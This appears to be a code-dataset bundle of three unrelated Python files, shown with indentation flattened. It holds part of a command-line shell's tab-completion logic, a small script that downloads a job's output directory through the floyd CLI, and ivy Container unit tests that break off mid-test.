choices, offset = completer(args)
if choices is None:
continue
self.debug.tag(completer.__name__).count().text(len(list(choices)))
if offset is None:
# The choices are already completion.Completion objects.
for choice in choices:
yield choice
else:
for choice in sorted(choices):
yield completion.Completion(choice, start_position=offset)
return
def CommandCompleter(self, args):
"""Returns the command/group completion choices for args or None.
Args:
args: The CLI tree parsed command args.
Returns:
(choices, offset):
choices - The list of completion strings or None.
offset - The completion prefix offset.
"""
arg = args[-1]
if arg.value.startswith('-'):
# A flag, not a command.
return None, 0
elif self.IsPrefixArg(args):
# The root command name arg ("argv[0]"), the first token at the beginning
# of the command line or the next token after a shell statement separator.
node = self.parser.root
prefix = arg.value
elif arg.token_type in (parser.ArgTokenType.COMMAND,
parser.ArgTokenType.GROUP) and not self.empty:
# A command/group with an exact CLI tree match. It could also be a prefix
# of other command/groups, so fall through to the default choices logic.
node = args[-2].tree if len(args) > 1 else self.parser.root
prefix = arg.value
elif arg.token_type == parser.ArgTokenType.GROUP:
# A command group with an exact CLI tree match.
if not self.empty:
return [], 0
node = arg.tree
prefix = ''
elif arg.token_type == parser.ArgTokenType.UNKNOWN:
# Unknown command arg type.
prefix = arg.value
if (self.manpage_generator and not prefix and
len(args) == 2 and args[0].value):
node = generate_cli_trees.LoadOrGenerate(args[0].value,
allow_extensions=True)
if not node:
return None, 0
self.parser.root[parser.LOOKUP_COMMANDS][args[0].value] = node
elif len(args) > 1 and args[-2].token_type == parser.ArgTokenType.GROUP:
node = args[-2].tree
else:
return None, 0
else:
# Don't know how to complete this arg.
return None, 0
choices = [k for k, v in six.iteritems(node[parser.LOOKUP_COMMANDS])
if k.startswith(prefix) and not self.IsSuppressed(v)]
if choices:
return choices, -len(prefix)
return None, 0
def ArgCompleter(self, args, arg, value):
"""Returns the flag or positional completion choices for arg or [].
Args:
args: The CLI tree parsed command args.
arg: The flag or positional argument.
value: The (partial) arg value.
Returns:
(choices, offset):
choices - The list of completion strings or None.
offset - The completion prefix offset.
"""
choices = arg.get(parser.LOOKUP_CHOICES)
if choices:
# static choices
return [v for v in choices if v.startswith(value)], -len(value)
if not value and not self.event.completion_requested:
return [], 0
module_path = arg.get(parser.LOOKUP_COMPLETER)
if not module_path:
return [], 0
# arg with a completer
cache = self.module_cache.get(module_path)
if not cache:
cache = ModuleCache(module_util.ImportModule(module_path))
self.module_cache[module_path] = cache
prefix = value
if not isinstance(cache.completer_class, type):
cache.choices = cache.completer_class(prefix=prefix)
elif cache.stale < time.time():
old_dict = self.parsed_args.__dict__
self.parsed_args.__dict__ = {}
self.parsed_args.__dict__.update(old_dict)
self.parsed_args.__dict__.update(_NameSpaceDict(args))
completer = parser_completer.ArgumentCompleter(
cache.completer_class,
parsed_args=self.parsed_args)
with Spinner(self.SetSpinner):
cache.choices = completer(prefix='')
self.parsed_args.__dict__ = old_dict
cache.stale = time.time() + cache.timeout
if arg.get(parser.LOOKUP_TYPE) == 'list':
parts = value.split(',')
prefix = parts[-1]
if not cache.choices:
return [], 0
return [v for v in cache.choices if v.startswith(prefix)], -len(prefix)
def FlagCompleter(self, args):
"""Returns the flag completion choices for args or None.
Args:
args: The CLI tree parsed command args.
Returns:
(choices, offset):
choices - The list of completion strings or None.
offset - The completion prefix offset.
"""
arg = args[-1]
if (arg.token_type == parser.ArgTokenType.FLAG_ARG and
args[-2].token_type == parser.ArgTokenType.FLAG and
(not arg.value and self.last in (' ', '=') or
arg.value and not self.empty)):
# A flag value arg with the cursor in the value so it's OK to complete.
flag = args[-2].tree
return self.ArgCompleter(args, flag, arg.value)
elif arg.token_type == parser.ArgTokenType.FLAG:
# A flag arg with an exact CLI tree match.
if not self.empty:
# The cursor is in the flag arg. See if it's a prefix of other flags.
# Search backwards in args to find the rightmost command node.
flags = {}
for a in reversed(args):
if a.tree and parser.LOOKUP_FLAGS in a.tree:
flags = a.tree[parser.LOOKUP_FLAGS]
break
completions = [k for k, v in six.iteritems(flags)
if k != arg.value and
k.startswith(arg.value) and
not self.IsSuppressed(v)]
if completions:
completions.append(arg.value)
return completions, -len(arg.value)
# Flag completed as is.
flag = arg.tree
if flag.get(parser.LOOKUP_TYPE) != 'bool':
completions, offset = self.ArgCompleter(args, flag, '')
# Massage the completions to insert a space between the flag and its value.
if not self.empty and self.last != '=':
completions = [' ' + c for c in completions]
return completions, offset
elif arg.value.startswith('-'):
# The arg is a flag prefix. Return the matching completions.
return [k for k, v in six.iteritems(arg.tree[parser.LOOKUP_FLAGS])
if k.startswith(arg.value) and
not self.IsSuppressed(v)], -len(arg.value)
return None, 0
def PositionalCompleter(self, args):
"""Returns the positional completion choices for args or None.
Args:
args: The CLI tree parsed command args.
Returns:
(choices, offset):
choices - The list of completion strings or None.
offset - The completion prefix offset.
"""
arg = args[-1]
if arg.token_type == parser.ArgTokenType.POSITIONAL:
return self.ArgCompleter(args, arg.tree, arg.value)
return None, 0
def InteractiveCompleter(self, args):
"""Returns the interactive completion choices for args or None.
Args:
args: The CLI tree parsed command args.
Returns:
(choices, offset):
choices - The list of completion strings or None.
offset - The completion prefix offset.
"""
# If the input command line ended with a space then the split command line
# must end with an empty string if it doesn't already. This instructs the
# completer to complete the next arg.
if self.empty and args[-1].value:
args = args[:]
args.append(parser.ArgToken('', parser.ArgTokenType.UNKNOWN, None))
# First check the cache.
completions = self.arg_cache.Lookup(args)
if not completions:
# Only call the coshell completer on an explicit TAB request.
prefix = self.DoExecutableCompletions() and self.IsPrefixArg(args)
if not self.event.completion_requested and not prefix:
return None, None
# Call the coshell completer and update the cache.
command = [arg.value for arg in args]
with Spinner(self.SetSpinner):
completions = self.coshell.GetCompletions(command, prefix=prefix)
self.debug.get.count()
if not completions:
return None, None
self.arg_cache.Update(args, completions)
else:
self.debug.hit.count()
last = args[-1].value
offset = -len(last)
# No dropdown for singletons -- just return the original completion
# (currently disabled via the `if False` guard below).
if False and len(completions) == 1 and completions[0].startswith(last):
return completions, offset
# Make path completions play nice with dropdowns. Add trailing '/' for dirs
# in the dropdown but not the completion. User types '/' to select a dir
# and ' ' to select a path.
#
# NOTE: '/' instead of os.path.sep since the coshell is bash even on Windows
chop = len(os.path.dirname(last))
uri_sep = _URI_SEP
uri_sep_index = completions[0].find(uri_sep)
if uri_sep_index > 0:
# Treat the completions as URI paths.
if not last:
chop = uri_sep_index + len(uri_sep)
# Construct the completion result list. No list comprehension here because
# MakePathCompletion() could return None.
result = []
strip_trailing_slash = len(completions) != 1
for c in completions:
path_completion = self.MakePathCompletion(
c, offset, chop, strip_trailing_slash)
if path_completion:
result.append(path_completion)
return result, None
@classmethod
def MakePathCompletion(cls, value, offset, chop, strip_trailing_slash=True):
"""Returns the Completion object for a file/uri path completion value.
Args:
value: The file/path completion value string.
offset: The Completion object offset used for dropdown display.
chop: The minimum number of chars to chop from the dropdown items.
strip_trailing_slash: Strip trailing '/' if True.
Returns:
The Completion object for a file path completion value or None if the
chopped/stripped value is empty.
"""
display = value
if chop:
display = display[chop:].lstrip('/')
if not display:
return None
if strip_trailing_slash and not value.endswith(_URI_SEP):
value = value.rstrip('/')
if not value:
return None
return completion.Completion(value, display=display, start_position=offset)
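# Worked example (a sketch, not executed by the module): for
# value='gs://bucket/dir/', chop=len('gs://bucket') and
# strip_trailing_slash=True, the dropdown displays 'dir/' while the text
# actually inserted is 'gs://bucket/dir', so the user can type '/' to descend
# into the directory or ' ' to accept the path.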
|
get_dir.py
|
#!/usr/bin/env python3
"""
Download the specified directory from the specified job's output files.
"""
import argparse
import os
import os.path as osp
import subprocess
import time
from multiprocessing import Process
def getfile(f):
dirname = osp.dirname(f)
os.makedirs(dirname, exist_ok=True)
print("Downloading {}...".format(f))
cmd = "floyd data getfile {}/output {}".format(args.job_id, f)
subprocess.check_output(cmd.split())
os.rename(osp.basename(f), osp.join(dirname, osp.basename(f)))
parser = argparse.ArgumentParser()
parser.add_argument("job_id")
parser.add_argument("dir")
args = parser.parse_args()
print("Listing files...")
cmd = "floyd data listfiles {}/output".format(args.job_id)
allfiles = subprocess.check_output(cmd.split()).decode().split('\n')
dirfiles = [f for f in allfiles if f.startswith(args.dir + '/')]
dirfiles = [f for f in dirfiles if not f.endswith('/')]
for f in dirfiles:
Process(target=getfile, args=(f, )).start()
time.sleep(0.5)
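# Example invocation (job id and directory names are placeholders):
#   python3 get_dir.py alice/projects/demo/7 checkpoints
# Every file under checkpoints/ in the job's output is fetched in its own
# process; the 0.5 s sleep merely staggers the floyd CLI calls.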
|
test_container.py
|
# global
import os
import queue
import pytest
import random
import numpy as np
import multiprocessing
import pickle
# local
import ivy
from ivy.container import Container
import ivy_tests.test_ivy.helpers as helpers
def test_container_list_join(device, call):
container_0 = Container(
{
"a": [ivy.array([1], device=device)],
"b": {
"c": [ivy.array([2], device=device)],
"d": [ivy.array([3], device=device)],
},
}
)
container_1 = Container(
{
"a": [ivy.array([4], device=device)],
"b": {
"c": [ivy.array([5], device=device)],
"d": [ivy.array([6], device=device)],
},
}
)
container_list_joined = ivy.Container.list_join([container_0, container_1])
assert np.allclose(ivy.to_numpy(container_list_joined["a"][0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_joined.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_joined["b"]["c"][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_joined["b"]["d"][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.d[0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_joined["a"][1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_joined.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_joined["b"]["c"][1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_joined["b"]["d"][1]), np.array([6]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.d[1]), np.array([6]))
def test_container_list_stack(device, call):
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_list_stacked = ivy.Container.list_stack([container_0, container_1], 0)
assert np.allclose(ivy.to_numpy(container_list_stacked["a"][0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_stacked.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_stacked["b"]["c"][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_stacked["b"]["d"][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.d[0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_stacked["a"][1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_stacked.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_stacked["b"]["c"][1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_stacked["b"]["d"][1]), np.array([6]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.d[1]), np.array([6]))
def test_container_unify(device, call):
# devices and containers
devices = list()
dev0 = device
devices.append(dev0)
conts = dict()
conts[dev0] = Container(
{
"a": ivy.array([1], device=dev0),
"b": {"c": ivy.array([2], device=dev0), "d": ivy.array([3], device=dev0)},
}
)
if "gpu" in device and ivy.num_gpus() > 1:
idx = ivy.num_gpus() - 1
dev1 = device[:-1] + str(idx)
devices.append(dev1)
conts[dev1] = Container(
{
"a": ivy.array([4], device=dev1),
"b": {
"c": ivy.array([5], device=dev1),
"d": ivy.array([6], device=dev1),
},
}
)
# test
container_unified = ivy.Container.unify(ivy.MultiDevItem(conts), dev0, "concat", 0)
assert np.allclose(ivy.to_numpy(container_unified.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_unified.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_unified.b.d[0]), np.array([3]))
if len(devices) > 1:
assert np.allclose(ivy.to_numpy(container_unified.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_unified.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_unified.b.d[1]), np.array([6]))
def test_container_concat(device, call):
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_concatenated = ivy.concat([container_0, container_1], 0)
assert np.allclose(ivy.to_numpy(container_concatenated["a"]), np.array([1, 4]))
assert np.allclose(ivy.to_numpy(container_concatenated.a), np.array([1, 4]))
assert np.allclose(ivy.to_numpy(container_concatenated["b"]["c"]), np.array([2, 5]))
assert np.allclose(ivy.to_numpy(container_concatenated.b.c), np.array([2, 5]))
assert np.allclose(ivy.to_numpy(container_concatenated["b"]["d"]), np.array([3, 6]))
assert np.allclose(ivy.to_numpy(container_concatenated.b.d), np.array([3, 6]))
# def test_container_stack(device, call):
# container_0 = Container(
# {
# "a": ivy.array([1], device=device),
# "b": {
# "c": ivy.array([2], device=device),
# "d": ivy.array([3], device=device),
# },
# }
# )
# container_1 = Container(
# {
# "a": ivy.array([4], device=device),
# "b": {
# "c": ivy.array([5], device=device),
# "d": ivy.array([6], device=device),
# },
# }
# )
# container_stacked = ivy.Container.stack([container_0, container_1], 0)
# assert np.allclose(ivy.to_numpy(container_stacked["a"]), np.array([[1], [4]]))
# assert np.allclose(ivy.to_numpy(container_stacked.a), np.array([[1], [4]]))
# assert np.allclose(ivy.to_numpy(container_stacked["b"]["c"]), np.array([[2],[5]]))
# assert np.allclose(ivy.to_numpy(container_stacked.b.c), np.array([[2], [5]]))
# assert np.allclose(ivy.to_numpy(container_stacked["b"]["d"]), np.array([[3],[6]]))
# assert np.allclose(ivy.to_numpy(container_stacked.b.d), np.array([[3], [6]]))
def test_container_combine(device, call):
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"e": ivy.array([6], device=device),
},
}
)
container_comb = ivy.Container.combine(container_0, container_1)
assert np.equal(ivy.to_numpy(container_comb.a), np.array([4]))
assert np.equal(ivy.to_numpy(container_comb.b.c), np.array([5]))
assert np.equal(ivy.to_numpy(container_comb.b.d), np.array([3]))
assert np.equal(ivy.to_numpy(container_comb.b.e), np.array([6]))
def test_container_diff(device, call):
# all different arrays
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.a.diff_1), np.array([4]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_1), np.array([6]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
# some different arrays
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert "a" not in container_diff_diff_only
assert "b" in container_diff_diff_only
assert "c" in container_diff_diff_only["b"]
assert "d" not in container_diff_diff_only["b"]
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert "a" in container_diff_same_only
assert "b" in container_diff_same_only
assert "c" not in container_diff_same_only["b"]
assert "d" in container_diff_same_only["b"]
# all different keys
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"e": ivy.array([1], device=device),
"f": {
"g": ivy.array([2], device=device),
"h": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.diff_0.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.diff_0.d), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.e.diff_1), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.f.diff_1.g), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.f.diff_1.h), np.array([3]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
# some different keys
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"e": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([3]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert "a" not in container_diff_diff_only
assert "b" in container_diff_diff_only
assert "c" not in container_diff_diff_only["b"]
assert "d" in container_diff_diff_only["b"]
assert "e" in container_diff_diff_only["b"]
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert "a" in container_diff_same_only
assert "b" in container_diff_same_only
assert "c" in container_diff_same_only["b"]
assert "d" not in container_diff_same_only["b"]
assert "e" not in container_diff_same_only["b"]
# same containers
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == {}
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == container_diff.to_dict()
# all different strings
container_0 = Container({"a": "1", "b": {"c": "2", "d": "3"}})
container_1 = Container({"a": "4", "b": {"c": "5", "d": "6"}})
container_diff = ivy.Container.diff(container_0, container_1)
assert container_diff.a.diff_0 == "1"
assert container_diff.a.diff_1 == "4"
assert container_diff.b.c.diff_0 == "2"
assert container_diff.b.c.diff_1 == "5"
assert container_diff.b.d.diff_0 == "3"
assert container_diff.b.d.diff_1 == "6"
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
def test_container_structural_diff(device, call):
# all different keys or shapes
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([[4]], device=device),
"b": {
"c": ivy.array([[[5]]], device=device),
"e": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.a.diff_1), np.array([[4]]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([[[5]]]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([3]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
# some different shapes
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([[5]], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert "a" not in container_diff_diff_only
assert "b" in container_diff_diff_only
assert "c" in container_diff_diff_only["b"]
assert "d" not in container_diff_diff_only["b"]
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert "a" in container_diff_same_only
assert "b" in container_diff_same_only
assert "c" not in container_diff_same_only["b"]
assert "d" in container_diff_same_only["b"]
# all different keys
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"e": ivy.array([4], device=device),
"f": {
"g": ivy.array([5], device=device),
"h": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.diff_0.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.diff_0.d), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.e.diff_1), np.array([4]))
assert np.equal(ivy.to_numpy(container_diff.f.diff_1.g), np.array([5]))
assert np.equal(ivy.to_numpy(container_diff.f.diff_1.h), np.array([6]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
# some different keys
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"e": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([6]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert "a" not in container_diff_diff_only
assert "b" in container_diff_diff_only
assert "c" not in container_diff_diff_only["b"]
assert "d" in container_diff_diff_only["b"]
assert "e" in container_diff_diff_only["b"]
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert "a" in container_diff_same_only
assert "b" in container_diff_same_only
assert "c" in container_diff_same_only["b"]
assert "d" not in container_diff_same_only["b"]
assert "e" not in container_diff_same_only["b"]
# all same
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == {}
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == container_diff.to_dict()
def test_container_from_dict(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_depth(device, call):
cont_depth1 = Container(
{"a": ivy.array([1], device=device), "b": ivy.array([2], device=device)}
)
assert cont_depth1.max_depth == 1
cont_depth2 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
assert cont_depth2.max_depth == 2
cont_depth3 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": {"d": ivy.array([2], device=device)},
"e": ivy.array([3], device=device),
},
}
)
assert cont_depth3.max_depth == 3
cont_depth4 = Container(
{
"a": ivy.array([1], device=device),
"b": {"c": {"d": {"e": ivy.array([2], device=device)}}},
}
)
assert cont_depth4.max_depth == 4
@pytest.mark.parametrize("inplace", [True, False])
def test_container_cutoff_at_depth(inplace, device, call):
# values
a_val = ivy.array([1], device=device)
bcde_val = ivy.array([2], device=device)
# depth 1
cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(1, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b
# depth 2
cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(2, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b.c
# depth 3
cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(3, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b.c.d
# depth 4
cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(4, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert np.allclose(ivy.to_numpy(cont_cutoff.b.c.d.e), ivy.to_numpy(bcde_val))
@pytest.mark.parametrize("inplace", [True, False])
def test_container_cutoff_at_height(inplace, device, call):
# values
d_val = ivy.array([2], device=device)
e_val = ivy.array([3], device=device)
# height 0
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(0, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a.c.d), ivy.to_numpy(d_val))
assert np.allclose(ivy.to_numpy(cont_cutoff.b.c.d.e), ivy.to_numpy(e_val))
# height 1
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(1, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a.c
assert not cont_cutoff.b.c.d
# height 2
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(2, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a
assert not cont_cutoff.b.c
# height 3
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(3, inplace=inplace)
if inplace:
